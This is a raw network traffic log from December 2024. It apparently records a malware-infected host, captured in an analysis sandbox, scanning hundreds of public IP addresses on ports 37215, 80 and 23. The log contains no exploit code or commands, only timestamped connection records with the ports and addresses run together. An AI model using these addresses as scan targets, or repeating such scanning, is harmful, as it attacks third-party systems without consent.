                                                    Dec 3, 2024 23:01:50.794647932 CET5953437215192.168.2.2341.56.205.34
                                                    Dec 3, 2024 23:01:50.794651985 CET5953437215192.168.2.23156.28.189.147
                                                    Dec 3, 2024 23:01:50.794663906 CET5953437215192.168.2.23197.169.178.55
                                                    Dec 3, 2024 23:01:50.794663906 CET5953437215192.168.2.23197.158.151.68
                                                    Dec 3, 2024 23:01:50.794676065 CET5953437215192.168.2.2341.102.141.16
                                                    Dec 3, 2024 23:01:50.794816017 CET3721559534197.195.206.136192.168.2.23
                                                    Dec 3, 2024 23:01:50.794825077 CET3721559534197.79.233.80192.168.2.23
                                                    Dec 3, 2024 23:01:50.794833899 CET3721559534156.64.119.227192.168.2.23
                                                    Dec 3, 2024 23:01:50.794842958 CET3721559534197.59.205.72192.168.2.23
                                                    Dec 3, 2024 23:01:50.794852018 CET3721559534197.167.188.184192.168.2.23
                                                    Dec 3, 2024 23:01:50.794858932 CET5953437215192.168.2.23197.195.206.136
                                                    Dec 3, 2024 23:01:50.794861078 CET3721559534156.44.235.16192.168.2.23
                                                    Dec 3, 2024 23:01:50.794862032 CET5953437215192.168.2.23197.79.233.80
                                                    Dec 3, 2024 23:01:50.794862032 CET5953437215192.168.2.23156.64.119.227
                                                    Dec 3, 2024 23:01:50.794871092 CET3721559534197.41.187.197192.168.2.23
                                                    Dec 3, 2024 23:01:50.794871092 CET5953437215192.168.2.23197.59.205.72
                                                    Dec 3, 2024 23:01:50.794879913 CET5953437215192.168.2.23197.167.188.184
                                                    Dec 3, 2024 23:01:50.794879913 CET3721559534197.163.246.243192.168.2.23
                                                    Dec 3, 2024 23:01:50.794889927 CET5953437215192.168.2.23156.44.235.16
                                                    Dec 3, 2024 23:01:50.794898987 CET3721559534156.158.172.243192.168.2.23
                                                    Dec 3, 2024 23:01:50.794898987 CET5953437215192.168.2.23197.41.187.197
                                                    Dec 3, 2024 23:01:50.794909954 CET372155953441.182.228.106192.168.2.23
                                                    Dec 3, 2024 23:01:50.794918060 CET3721559534197.213.139.45192.168.2.23
                                                    Dec 3, 2024 23:01:50.794918060 CET5953437215192.168.2.23197.163.246.243
                                                    Dec 3, 2024 23:01:50.794929028 CET372155953441.128.193.69192.168.2.23
                                                    Dec 3, 2024 23:01:50.794938087 CET3721559534156.30.14.110192.168.2.23
                                                    Dec 3, 2024 23:01:50.794939995 CET5953437215192.168.2.23156.158.172.243
                                                    Dec 3, 2024 23:01:50.794945002 CET5953437215192.168.2.2341.182.228.106
                                                    Dec 3, 2024 23:01:50.794948101 CET5953437215192.168.2.23197.213.139.45
                                                    Dec 3, 2024 23:01:50.794965029 CET5953437215192.168.2.23156.30.14.110
                                                    Dec 3, 2024 23:01:50.794965029 CET5953437215192.168.2.2341.128.193.69
                                                    Dec 3, 2024 23:01:50.794974089 CET372155953441.237.37.216192.168.2.23
                                                    Dec 3, 2024 23:01:50.794984102 CET3721559534156.114.247.128192.168.2.23
                                                    Dec 3, 2024 23:01:50.794991970 CET372155953441.9.223.148192.168.2.23
                                                    Dec 3, 2024 23:01:50.795001030 CET3721559534197.122.183.130192.168.2.23
                                                    Dec 3, 2024 23:01:50.795008898 CET372155953441.8.68.180192.168.2.23
                                                    Dec 3, 2024 23:01:50.795017958 CET3721559534156.61.209.114192.168.2.23
                                                    Dec 3, 2024 23:01:50.795022011 CET5953437215192.168.2.23156.114.247.128
                                                    Dec 3, 2024 23:01:50.795022011 CET5953437215192.168.2.2341.9.223.148
                                                    Dec 3, 2024 23:01:50.795023918 CET5953437215192.168.2.2341.237.37.216
                                                    Dec 3, 2024 23:01:50.795027018 CET372155953441.186.242.231192.168.2.23
                                                    Dec 3, 2024 23:01:50.795028925 CET5953437215192.168.2.23197.122.183.130
                                                    Dec 3, 2024 23:01:50.795037985 CET3721559534197.17.133.49192.168.2.23
                                                    Dec 3, 2024 23:01:50.795046091 CET5953437215192.168.2.2341.8.68.180
                                                    Dec 3, 2024 23:01:50.795046091 CET5953437215192.168.2.23156.61.209.114
                                                    Dec 3, 2024 23:01:50.795048952 CET372155953441.153.210.0192.168.2.23
                                                    Dec 3, 2024 23:01:50.795072079 CET5953437215192.168.2.2341.186.242.231
                                                    Dec 3, 2024 23:01:50.795072079 CET5953437215192.168.2.23197.17.133.49
                                                    Dec 3, 2024 23:01:50.795084953 CET5953437215192.168.2.2341.153.210.0
                                                    Dec 3, 2024 23:01:50.795470953 CET2362862195.77.6.45192.168.2.23
                                                    Dec 3, 2024 23:01:50.795512915 CET6286223192.168.2.23195.77.6.45
                                                    Dec 3, 2024 23:01:50.814271927 CET8055322151.59.53.207192.168.2.23
                                                    Dec 3, 2024 23:01:50.814357996 CET5532280192.168.2.23151.59.53.207
                                                    Dec 3, 2024 23:01:50.814435959 CET5701280192.168.2.2375.244.175.40
                                                    Dec 3, 2024 23:01:50.814450979 CET4823880192.168.2.2392.205.42.249
                                                    Dec 3, 2024 23:01:50.814454079 CET3326480192.168.2.2360.164.109.203
                                                    Dec 3, 2024 23:01:50.814466000 CET4659280192.168.2.2379.149.81.197
                                                    Dec 3, 2024 23:01:50.814481020 CET4157880192.168.2.23184.47.95.238
                                                    Dec 3, 2024 23:01:50.814511061 CET3301480192.168.2.23124.90.254.6
                                                    Dec 3, 2024 23:01:50.814512014 CET4085880192.168.2.23184.220.227.77
                                                    Dec 3, 2024 23:01:50.814515114 CET5443280192.168.2.23158.67.27.131
                                                    Dec 3, 2024 23:01:50.814527035 CET3783080192.168.2.23165.207.12.117
                                                    Dec 3, 2024 23:01:50.814538956 CET4412280192.168.2.23124.180.100.208
                                                    Dec 3, 2024 23:01:50.814548016 CET5771280192.168.2.23212.110.217.75
                                                    Dec 3, 2024 23:01:50.814577103 CET5684680192.168.2.23203.53.63.115
                                                    Dec 3, 2024 23:01:50.814590931 CET4419080192.168.2.23112.16.175.41
                                                    Dec 3, 2024 23:01:50.814594984 CET4299880192.168.2.23184.145.222.88
                                                    Dec 3, 2024 23:01:50.814613104 CET3867080192.168.2.2357.16.75.18
                                                    Dec 3, 2024 23:01:50.814626932 CET5966080192.168.2.2340.208.105.235
                                                    Dec 3, 2024 23:01:50.814632893 CET5954280192.168.2.23205.244.238.92
                                                    Dec 3, 2024 23:01:50.814677954 CET4323280192.168.2.23164.63.62.180
                                                    Dec 3, 2024 23:01:50.814685106 CET5368880192.168.2.2350.151.21.8
                                                    Dec 3, 2024 23:01:50.814690113 CET6027880192.168.2.23123.52.192.123
                                                    Dec 3, 2024 23:01:50.814703941 CET5915680192.168.2.2382.120.56.10
                                                    Dec 3, 2024 23:01:50.814723015 CET5986280192.168.2.23111.235.227.103
                                                    Dec 3, 2024 23:01:50.814733982 CET3720080192.168.2.23198.53.211.167
                                                    Dec 3, 2024 23:01:50.814752102 CET3585480192.168.2.2381.114.132.64
                                                    Dec 3, 2024 23:01:50.814753056 CET4246080192.168.2.23146.63.138.246
                                                    Dec 3, 2024 23:01:50.814775944 CET5193280192.168.2.2364.182.50.28
                                                    Dec 3, 2024 23:01:50.814789057 CET4281680192.168.2.2373.36.157.53
                                                    Dec 3, 2024 23:01:50.814801931 CET3943880192.168.2.2368.184.62.249
                                                    Dec 3, 2024 23:01:50.814814091 CET3641880192.168.2.23208.239.12.189
                                                    Dec 3, 2024 23:01:50.814821005 CET5907680192.168.2.23177.233.205.201
                                                    Dec 3, 2024 23:01:50.814835072 CET4535080192.168.2.23143.150.243.101
                                                    Dec 3, 2024 23:01:50.814915895 CET5532280192.168.2.23151.59.53.207
                                                    Dec 3, 2024 23:01:50.814915895 CET5532280192.168.2.23151.59.53.207
                                                    Dec 3, 2024 23:01:50.814939022 CET5539480192.168.2.23151.59.53.207
                                                    Dec 3, 2024 23:01:50.938469887 CET805701275.244.175.40192.168.2.23
                                                    Dec 3, 2024 23:01:50.938498020 CET804823892.205.42.249192.168.2.23
                                                    Dec 3, 2024 23:01:50.938508987 CET803326460.164.109.203192.168.2.23
                                                    Dec 3, 2024 23:01:50.938519001 CET804659279.149.81.197192.168.2.23
                                                    Dec 3, 2024 23:01:50.938530922 CET8041578184.47.95.238192.168.2.23
                                                    Dec 3, 2024 23:01:50.938538074 CET5701280192.168.2.2375.244.175.40
                                                    Dec 3, 2024 23:01:50.938554049 CET8033014124.90.254.6192.168.2.23
                                                    Dec 3, 2024 23:01:50.938555002 CET4823880192.168.2.2392.205.42.249
                                                    Dec 3, 2024 23:01:50.938559055 CET3326480192.168.2.2360.164.109.203
                                                    Dec 3, 2024 23:01:50.938565969 CET8040858184.220.227.77192.168.2.23
                                                    Dec 3, 2024 23:01:50.938574076 CET4659280192.168.2.2379.149.81.197
                                                    Dec 3, 2024 23:01:50.938576937 CET8037830165.207.12.117192.168.2.23
                                                    Dec 3, 2024 23:01:50.938576937 CET4157880192.168.2.23184.47.95.238
                                                    Dec 3, 2024 23:01:50.938596964 CET8054432158.67.27.131192.168.2.23
                                                    Dec 3, 2024 23:01:50.938599110 CET4085880192.168.2.23184.220.227.77
                                                    Dec 3, 2024 23:01:50.938601017 CET3301480192.168.2.23124.90.254.6
                                                    Dec 3, 2024 23:01:50.938608885 CET8044122124.180.100.208192.168.2.23
                                                    Dec 3, 2024 23:01:50.938610077 CET3783080192.168.2.23165.207.12.117
                                                    Dec 3, 2024 23:01:50.938618898 CET8057712212.110.217.75192.168.2.23
                                                    Dec 3, 2024 23:01:50.938630104 CET8056846203.53.63.115192.168.2.23
                                                    Dec 3, 2024 23:01:50.938633919 CET5443280192.168.2.23158.67.27.131
                                                    Dec 3, 2024 23:01:50.938640118 CET8044190112.16.175.41192.168.2.23
                                                    Dec 3, 2024 23:01:50.938643932 CET4412280192.168.2.23124.180.100.208
                                                    Dec 3, 2024 23:01:50.938661098 CET5771280192.168.2.23212.110.217.75
                                                    Dec 3, 2024 23:01:50.938664913 CET5684680192.168.2.23203.53.63.115
                                                    Dec 3, 2024 23:01:50.938674927 CET4419080192.168.2.23112.16.175.41
                                                    Dec 3, 2024 23:01:50.938703060 CET5701280192.168.2.2375.244.175.40
                                                    Dec 3, 2024 23:01:50.938703060 CET5701280192.168.2.2375.244.175.40
                                                    Dec 3, 2024 23:01:50.938713074 CET8055322151.59.53.207192.168.2.23
                                                    Dec 3, 2024 23:01:50.938726902 CET5707680192.168.2.2375.244.175.40
                                                    Dec 3, 2024 23:01:50.938734055 CET4823880192.168.2.2392.205.42.249
                                                    Dec 3, 2024 23:01:50.938734055 CET4823880192.168.2.2392.205.42.249
                                                    Dec 3, 2024 23:01:50.938760042 CET4830280192.168.2.2392.205.42.249
                                                    Dec 3, 2024 23:01:50.938772917 CET3326480192.168.2.2360.164.109.203
                                                    Dec 3, 2024 23:01:50.938772917 CET3326480192.168.2.2360.164.109.203
                                                    Dec 3, 2024 23:01:50.938786030 CET3332880192.168.2.2360.164.109.203
                                                    Dec 3, 2024 23:01:50.938791037 CET4659280192.168.2.2379.149.81.197
                                                    Dec 3, 2024 23:01:50.938791037 CET4659280192.168.2.2379.149.81.197
                                                    Dec 3, 2024 23:01:50.938815117 CET4157880192.168.2.23184.47.95.238
                                                    Dec 3, 2024 23:01:50.938815117 CET4157880192.168.2.23184.47.95.238
                                                    Dec 3, 2024 23:01:50.938817024 CET4665680192.168.2.2379.149.81.197
                                                    Dec 3, 2024 23:01:50.938838959 CET4164280192.168.2.23184.47.95.238
                                                    Dec 3, 2024 23:01:50.938839912 CET3301480192.168.2.23124.90.254.6
                                                    Dec 3, 2024 23:01:50.938839912 CET3301480192.168.2.23124.90.254.6
                                                    Dec 3, 2024 23:01:50.938855886 CET3307880192.168.2.23124.90.254.6
                                                    Dec 3, 2024 23:01:50.938865900 CET4085880192.168.2.23184.220.227.77
                                                    Dec 3, 2024 23:01:50.938865900 CET4085880192.168.2.23184.220.227.77
                                                    Dec 3, 2024 23:01:50.938879967 CET4092080192.168.2.23184.220.227.77
                                                    Dec 3, 2024 23:01:50.938885927 CET3783080192.168.2.23165.207.12.117
                                                    Dec 3, 2024 23:01:50.938885927 CET3783080192.168.2.23165.207.12.117
                                                    Dec 3, 2024 23:01:50.938913107 CET3789280192.168.2.23165.207.12.117
                                                    Dec 3, 2024 23:01:50.938927889 CET5443280192.168.2.23158.67.27.131
                                                    Dec 3, 2024 23:01:50.938927889 CET5443280192.168.2.23158.67.27.131
                                                    Dec 3, 2024 23:01:50.938935995 CET5450080192.168.2.23158.67.27.131
                                                    Dec 3, 2024 23:01:50.938950062 CET4418680192.168.2.23124.180.100.208
                                                    Dec 3, 2024 23:01:50.938952923 CET4412280192.168.2.23124.180.100.208
                                                    Dec 3, 2024 23:01:50.938952923 CET4412280192.168.2.23124.180.100.208
                                                    Dec 3, 2024 23:01:50.938970089 CET5771280192.168.2.23212.110.217.75
                                                    Dec 3, 2024 23:01:50.938970089 CET5771280192.168.2.23212.110.217.75
                                                    Dec 3, 2024 23:01:50.938977003 CET5777680192.168.2.23212.110.217.75
                                                    Dec 3, 2024 23:01:50.938997984 CET5684680192.168.2.23203.53.63.115
                                                    Dec 3, 2024 23:01:50.938998938 CET5684680192.168.2.23203.53.63.115
                                                    Dec 3, 2024 23:01:50.939011097 CET5691080192.168.2.23203.53.63.115
                                                    Dec 3, 2024 23:01:50.939022064 CET4425480192.168.2.23112.16.175.41
                                                    Dec 3, 2024 23:01:50.939023018 CET4419080192.168.2.23112.16.175.41
                                                    Dec 3, 2024 23:01:50.939023018 CET4419080192.168.2.23112.16.175.41
                                                    Dec 3, 2024 23:01:50.985848904 CET8055322151.59.53.207192.168.2.23
                                                    Dec 3, 2024 23:01:51.042414904 CET3519280192.168.2.23135.15.7.163
                                                    Dec 3, 2024 23:01:51.063060999 CET805701275.244.175.40192.168.2.23
                                                    Dec 3, 2024 23:01:51.063072920 CET805707675.244.175.40192.168.2.23
                                                    Dec 3, 2024 23:01:51.063081026 CET804823892.205.42.249192.168.2.23
                                                    Dec 3, 2024 23:01:51.063086033 CET804830292.205.42.249192.168.2.23
                                                    Dec 3, 2024 23:01:51.063113928 CET803326460.164.109.203192.168.2.23
                                                    Dec 3, 2024 23:01:51.063144922 CET5707680192.168.2.2375.244.175.40
                                                    Dec 3, 2024 23:01:51.063153982 CET4830280192.168.2.2392.205.42.249
                                                    Dec 3, 2024 23:01:51.063154936 CET5707680192.168.2.2375.244.175.40
                                                    Dec 3, 2024 23:01:51.063163042 CET804659279.149.81.197192.168.2.23
                                                    Dec 3, 2024 23:01:51.063183069 CET6004680192.168.2.23152.212.240.188
                                                    Dec 3, 2024 23:01:51.063186884 CET4830280192.168.2.2392.205.42.249
                                                    Dec 3, 2024 23:01:51.063186884 CET6004680192.168.2.2338.96.150.180
                                                    Dec 3, 2024 23:01:51.063186884 CET6004680192.168.2.2337.30.94.170
                                                    Dec 3, 2024 23:01:51.063204050 CET6004680192.168.2.23153.78.233.79
                                                    Dec 3, 2024 23:01:51.063205004 CET6004680192.168.2.23102.137.240.134
                                                    Dec 3, 2024 23:01:51.063205004 CET6004680192.168.2.23109.62.119.7
                                                    Dec 3, 2024 23:01:51.063215971 CET6004680192.168.2.23165.173.127.185
                                                    Dec 3, 2024 23:01:51.063218117 CET6004680192.168.2.23173.230.32.46
                                                    Dec 3, 2024 23:01:51.063219070 CET6004680192.168.2.23133.245.87.115
                                                    Dec 3, 2024 23:01:51.063219070 CET6004680192.168.2.23116.80.66.91
                                                    Dec 3, 2024 23:01:51.063220978 CET6004680192.168.2.23142.22.147.27
                                                    Dec 3, 2024 23:01:51.063221931 CET6004680192.168.2.23171.211.229.250
                                                    Dec 3, 2024 23:01:51.063220978 CET6004680192.168.2.2383.193.229.218
                                                    Dec 3, 2024 23:01:51.063230038 CET6004680192.168.2.23188.121.196.87
                                                    Dec 3, 2024 23:01:51.063235998 CET6004680192.168.2.2354.34.212.242
                                                    Dec 3, 2024 23:01:51.063246012 CET6004680192.168.2.23133.235.238.193
                                                    Dec 3, 2024 23:01:51.063246012 CET6004680192.168.2.2358.103.106.232
                                                    Dec 3, 2024 23:01:51.063254118 CET6004680192.168.2.2385.4.96.222
                                                    Dec 3, 2024 23:01:51.063261032 CET6004680192.168.2.2373.21.187.112
                                                    Dec 3, 2024 23:01:51.063272953 CET6004680192.168.2.23133.184.23.4
                                                    Dec 3, 2024 23:01:51.063275099 CET6004680192.168.2.2389.22.202.145
                                                    Dec 3, 2024 23:01:51.063280106 CET6004680192.168.2.232.65.162.150
                                                    Dec 3, 2024 23:01:51.063281059 CET6004680192.168.2.2381.240.13.248
                                                    Dec 3, 2024 23:01:51.063286066 CET6004680192.168.2.23150.38.232.45
                                                    Dec 3, 2024 23:01:51.063290119 CET6004680192.168.2.23202.59.62.176
                                                    Dec 3, 2024 23:01:51.063293934 CET6004680192.168.2.23174.13.111.235
                                                    Dec 3, 2024 23:01:51.063294888 CET6004680192.168.2.2320.155.24.125
                                                    Dec 3, 2024 23:01:51.063296080 CET6004680192.168.2.23133.91.58.129
                                                    Dec 3, 2024 23:01:51.063298941 CET6004680192.168.2.23121.50.197.23
                                                    Dec 3, 2024 23:01:51.063306093 CET6004680192.168.2.2318.58.127.165
                                                    Dec 3, 2024 23:01:51.063307047 CET6004680192.168.2.2338.60.193.189
                                                    Dec 3, 2024 23:01:51.063308001 CET6004680192.168.2.23147.24.45.198
                                                    Dec 3, 2024 23:01:51.063308001 CET6004680192.168.2.2314.33.222.90
                                                    Dec 3, 2024 23:01:51.063323021 CET6004680192.168.2.2327.213.187.69
                                                    Dec 3, 2024 23:01:51.063323021 CET6004680192.168.2.23174.146.59.129
                                                    Dec 3, 2024 23:01:51.063335896 CET6004680192.168.2.23130.79.67.45
                                                    Dec 3, 2024 23:01:51.063338041 CET6004680192.168.2.23134.5.185.217
                                                    Dec 3, 2024 23:01:51.063338041 CET6004680192.168.2.2382.206.110.80
                                                    Dec 3, 2024 23:01:51.063339949 CET6004680192.168.2.23147.10.68.2
                                                    Dec 3, 2024 23:01:51.063344955 CET6004680192.168.2.23208.209.211.112
                                                    Dec 3, 2024 23:01:51.063359022 CET6004680192.168.2.23140.207.30.242
                                                    Dec 3, 2024 23:01:51.063363075 CET6004680192.168.2.23159.173.225.8
                                                    Dec 3, 2024 23:01:51.063364983 CET6004680192.168.2.23103.161.218.4
                                                    Dec 3, 2024 23:01:51.063366890 CET6004680192.168.2.23170.9.133.68
                                                    Dec 3, 2024 23:01:51.063366890 CET6004680192.168.2.2338.170.147.54
                                                    Dec 3, 2024 23:01:51.063366890 CET6004680192.168.2.23135.134.152.126
                                                    Dec 3, 2024 23:01:51.063366890 CET6004680192.168.2.23147.27.113.124
                                                    Dec 3, 2024 23:01:51.063375950 CET6004680192.168.2.2334.240.169.36
                                                    Dec 3, 2024 23:01:51.063380003 CET6004680192.168.2.23130.125.218.219
                                                    Dec 3, 2024 23:01:51.063380957 CET6004680192.168.2.2346.195.248.88
                                                    Dec 3, 2024 23:01:51.063396931 CET6004680192.168.2.2343.172.190.131
                                                    Dec 3, 2024 23:01:51.063396931 CET6004680192.168.2.23217.97.226.221
                                                    Dec 3, 2024 23:01:51.063399076 CET6004680192.168.2.2339.227.17.235
                                                    Dec 3, 2024 23:01:51.063396931 CET6004680192.168.2.23176.225.48.139
                                                    Dec 3, 2024 23:01:51.063396931 CET6004680192.168.2.2380.238.230.56
                                                    Dec 3, 2024 23:01:51.063400030 CET6004680192.168.2.23209.49.165.237
                                                    Dec 3, 2024 23:01:51.063400030 CET6004680192.168.2.23194.88.15.56
                                                    Dec 3, 2024 23:01:51.063396931 CET6004680192.168.2.23141.76.215.185
                                                    Dec 3, 2024 23:01:51.063400030 CET6004680192.168.2.23134.157.5.67
                                                    Dec 3, 2024 23:01:51.063400984 CET6004680192.168.2.2323.81.182.251
                                                    Dec 3, 2024 23:01:51.063409090 CET6004680192.168.2.2317.185.40.26
                                                    Dec 3, 2024 23:01:51.063410044 CET6004680192.168.2.2385.25.186.196
                                                    Dec 3, 2024 23:01:51.063410044 CET6004680192.168.2.23152.255.188.141
                                                    Dec 3, 2024 23:01:51.063410997 CET6004680192.168.2.23130.87.195.54
                                                    Dec 3, 2024 23:01:51.063411951 CET6004680192.168.2.2387.94.13.3
                                                    Dec 3, 2024 23:01:51.063410997 CET6004680192.168.2.23186.222.173.100
                                                    Dec 3, 2024 23:01:51.063410997 CET6004680192.168.2.23210.153.54.187
                                                    Dec 3, 2024 23:01:51.063415051 CET6004680192.168.2.2314.127.226.24
                                                    Dec 3, 2024 23:01:51.063415051 CET6004680192.168.2.23192.198.147.233
                                                    Dec 3, 2024 23:01:51.063415051 CET6004680192.168.2.2382.108.192.93
                                                    Dec 3, 2024 23:01:51.063415051 CET6004680192.168.2.23138.54.24.178
                                                    Dec 3, 2024 23:01:51.063415051 CET6004680192.168.2.23109.74.247.238
                                                    Dec 3, 2024 23:01:51.063417912 CET6004680192.168.2.23129.199.163.25
                                                    Dec 3, 2024 23:01:51.063419104 CET803332860.164.109.203192.168.2.23
                                                    Dec 3, 2024 23:01:51.063426018 CET6004680192.168.2.2348.251.243.10
                                                    Dec 3, 2024 23:01:51.063427925 CET8041578184.47.95.238192.168.2.23
                                                    Dec 3, 2024 23:01:51.063430071 CET6004680192.168.2.2370.25.63.157
                                                    Dec 3, 2024 23:01:51.063430071 CET6004680192.168.2.2393.130.101.134
                                                    Dec 3, 2024 23:01:51.063430071 CET6004680192.168.2.2357.56.57.154
                                                    Dec 3, 2024 23:01:51.063433886 CET6004680192.168.2.238.133.188.41
                                                    Dec 3, 2024 23:01:51.063435078 CET6004680192.168.2.23222.55.73.225
                                                    Dec 3, 2024 23:01:51.063436031 CET6004680192.168.2.2324.162.186.64
                                                    Dec 3, 2024 23:01:51.063436985 CET6004680192.168.2.23137.43.213.163
                                                    Dec 3, 2024 23:01:51.063446999 CET804665679.149.81.197192.168.2.23
                                                    Dec 3, 2024 23:01:51.063447952 CET6004680192.168.2.2349.115.48.134
                                                    Dec 3, 2024 23:01:51.063448906 CET6004680192.168.2.2312.12.95.234
                                                    Dec 3, 2024 23:01:51.063451052 CET6004680192.168.2.2358.30.242.189
                                                    Dec 3, 2024 23:01:51.063452959 CET6004680192.168.2.2390.93.186.197
                                                    Dec 3, 2024 23:01:51.063455105 CET6004680192.168.2.23164.155.207.200
                                                    Dec 3, 2024 23:01:51.063455105 CET3332880192.168.2.2360.164.109.203
                                                    Dec 3, 2024 23:01:51.063455105 CET6004680192.168.2.2398.180.205.225
                                                    Dec 3, 2024 23:01:51.063457012 CET8033014124.90.254.6192.168.2.23
                                                    Dec 3, 2024 23:01:51.063461065 CET6004680192.168.2.2367.216.62.149
                                                    Dec 3, 2024 23:01:51.063465118 CET6004680192.168.2.2380.156.50.186
                                                    Dec 3, 2024 23:01:51.063466072 CET8041642184.47.95.238192.168.2.23
                                                    Dec 3, 2024 23:01:51.063472986 CET4665680192.168.2.2379.149.81.197
                                                    Dec 3, 2024 23:01:51.063479900 CET6004680192.168.2.2345.3.81.32
                                                    Dec 3, 2024 23:01:51.063493013 CET6004680192.168.2.23211.54.48.161
                                                    Dec 3, 2024 23:01:51.063498974 CET6004680192.168.2.23144.119.178.59
                                                    Dec 3, 2024 23:01:51.063498974 CET6004680192.168.2.2312.54.185.74
                                                    Dec 3, 2024 23:01:51.063499928 CET4164280192.168.2.23184.47.95.238
                                                    Dec 3, 2024 23:01:51.063505888 CET6004680192.168.2.2375.84.226.126
                                                    Dec 3, 2024 23:01:51.063507080 CET6004680192.168.2.2393.14.121.227
                                                    Dec 3, 2024 23:01:51.063509941 CET6004680192.168.2.2358.94.158.196
                                                    Dec 3, 2024 23:01:51.063509941 CET6004680192.168.2.2362.17.164.99
                                                    Dec 3, 2024 23:01:51.063510895 CET6004680192.168.2.2372.23.142.91
                                                    Dec 3, 2024 23:01:51.063510895 CET6004680192.168.2.23108.172.48.15
                                                    Dec 3, 2024 23:01:51.063517094 CET6004680192.168.2.23148.231.243.124
                                                    Dec 3, 2024 23:01:51.063536882 CET6004680192.168.2.2393.208.120.58
                                                    Dec 3, 2024 23:01:51.063536882 CET6004680192.168.2.2354.163.106.253
                                                    Dec 3, 2024 23:01:51.063539028 CET6004680192.168.2.2339.238.1.150
                                                    Dec 3, 2024 23:01:51.063539982 CET6004680192.168.2.23150.215.86.134
                                                    Dec 3, 2024 23:01:51.063544035 CET6004680192.168.2.23216.183.116.76
                                                    Dec 3, 2024 23:01:51.063544035 CET6004680192.168.2.23104.249.201.65
                                                    Dec 3, 2024 23:01:51.063551903 CET6004680192.168.2.2367.211.195.34
                                                    Dec 3, 2024 23:01:51.063556910 CET6004680192.168.2.2397.55.249.122
                                                    Dec 3, 2024 23:01:51.063570976 CET6004680192.168.2.2319.65.218.238
                                                    Dec 3, 2024 23:01:51.063570976 CET6004680192.168.2.23188.213.177.138
                                                    Dec 3, 2024 23:01:51.063571930 CET6004680192.168.2.23159.249.65.254
                                                    Dec 3, 2024 23:01:51.063571930 CET6004680192.168.2.2367.233.108.53
                                                    Dec 3, 2024 23:01:51.063586950 CET6004680192.168.2.23133.248.246.78
                                                    Dec 3, 2024 23:01:51.063596010 CET6004680192.168.2.2396.165.114.160
                                                    Dec 3, 2024 23:01:51.063597918 CET6004680192.168.2.2359.181.83.84
                                                    Dec 3, 2024 23:01:51.063605070 CET6004680192.168.2.2393.131.179.101
                                                    Dec 3, 2024 23:01:51.063608885 CET6004680192.168.2.23175.232.149.195
                                                    Dec 3, 2024 23:01:51.063621044 CET6004680192.168.2.23165.35.203.196
                                                    Dec 3, 2024 23:01:51.063621998 CET6004680192.168.2.2395.106.229.150
                                                    Dec 3, 2024 23:01:51.063621044 CET6004680192.168.2.23208.216.74.168
                                                    Dec 3, 2024 23:01:51.063633919 CET6004680192.168.2.2357.48.189.39
                                                    Dec 3, 2024 23:01:51.063636065 CET6004680192.168.2.2338.118.239.180
                                                    Dec 3, 2024 23:01:51.063636065 CET6004680192.168.2.2349.5.147.213
                                                    Dec 3, 2024 23:01:51.063647985 CET6004680192.168.2.2344.42.12.183
                                                    Dec 3, 2024 23:01:51.063647985 CET6004680192.168.2.23169.188.39.189
                                                    Dec 3, 2024 23:01:51.063656092 CET6004680192.168.2.23207.101.143.116
                                                    Dec 3, 2024 23:01:51.063658953 CET6004680192.168.2.2348.116.79.214
                                                    Dec 3, 2024 23:01:51.063666105 CET6004680192.168.2.23221.184.100.201
                                                    Dec 3, 2024 23:01:51.063666105 CET6004680192.168.2.2319.197.83.88
                                                    Dec 3, 2024 23:01:51.063678980 CET6004680192.168.2.23181.110.1.179
                                                    Dec 3, 2024 23:01:51.063689947 CET6004680192.168.2.2376.16.68.194
                                                    Dec 3, 2024 23:01:51.063692093 CET6004680192.168.2.2325.241.66.152
                                                    Dec 3, 2024 23:01:51.063692093 CET6004680192.168.2.23194.130.69.6
                                                    Dec 3, 2024 23:01:51.063692093 CET6004680192.168.2.23179.125.109.224
                                                    Dec 3, 2024 23:01:51.063699007 CET6004680192.168.2.23140.204.3.105
                                                    Dec 3, 2024 23:01:51.063702106 CET6004680192.168.2.23193.7.217.121
                                                    Dec 3, 2024 23:01:51.063704014 CET6004680192.168.2.2399.95.65.146
                                                    Dec 3, 2024 23:01:51.063713074 CET6004680192.168.2.23154.133.44.111
                                                    Dec 3, 2024 23:01:51.063713074 CET6004680192.168.2.23101.180.153.183
                                                    Dec 3, 2024 23:01:51.063713074 CET6004680192.168.2.2349.26.58.62
                                                    Dec 3, 2024 23:01:51.063719988 CET6004680192.168.2.2339.128.81.177
                                                    Dec 3, 2024 23:01:51.063719988 CET6004680192.168.2.2383.106.116.111
                                                    Dec 3, 2024 23:01:51.063719988 CET6004680192.168.2.2320.63.17.66
                                                    Dec 3, 2024 23:01:51.063721895 CET6004680192.168.2.2344.71.192.221
                                                    Dec 3, 2024 23:01:51.063724041 CET6004680192.168.2.2318.85.56.16
                                                    Dec 3, 2024 23:01:51.063724995 CET6004680192.168.2.23164.179.185.29
                                                    Dec 3, 2024 23:01:51.063724041 CET6004680192.168.2.23192.77.226.135
                                                    Dec 3, 2024 23:01:51.063724995 CET6004680192.168.2.23213.170.88.5
                                                    Dec 3, 2024 23:01:51.063733101 CET6004680192.168.2.23191.159.94.94
                                                    Dec 3, 2024 23:01:51.063750982 CET6004680192.168.2.2335.143.254.114
                                                    Dec 3, 2024 23:01:51.063751936 CET6004680192.168.2.2347.200.93.150
                                                    Dec 3, 2024 23:01:51.063751936 CET6004680192.168.2.2336.172.179.43
                                                    Dec 3, 2024 23:01:51.063751936 CET6004680192.168.2.23152.29.13.194
                                                    Dec 3, 2024 23:01:51.063760042 CET6004680192.168.2.23118.134.250.241
                                                    Dec 3, 2024 23:01:51.063761950 CET6004680192.168.2.23210.1.156.2
                                                    Dec 3, 2024 23:01:51.063775063 CET6004680192.168.2.2341.23.76.7
                                                    Dec 3, 2024 23:01:51.063776016 CET6004680192.168.2.23217.2.223.87
                                                    Dec 3, 2024 23:01:51.063776016 CET6004680192.168.2.2335.148.26.203
                                                    Dec 3, 2024 23:01:51.063779116 CET6004680192.168.2.23202.251.4.154
                                                    Dec 3, 2024 23:01:51.063779116 CET6004680192.168.2.23147.170.102.2
                                                    Dec 3, 2024 23:01:51.063791990 CET6004680192.168.2.2349.199.162.47
                                                    Dec 3, 2024 23:01:51.063793898 CET6004680192.168.2.2339.195.174.166
                                                    Dec 3, 2024 23:01:51.063796997 CET6004680192.168.2.2372.200.242.152
                                                    Dec 3, 2024 23:01:51.063796997 CET6004680192.168.2.2335.163.255.178
                                                    Dec 3, 2024 23:01:51.063805103 CET6004680192.168.2.2318.195.13.242
                                                    Dec 3, 2024 23:01:51.063807964 CET6004680192.168.2.23156.152.174.123
                                                    Dec 3, 2024 23:01:51.063812017 CET8033078124.90.254.6192.168.2.23
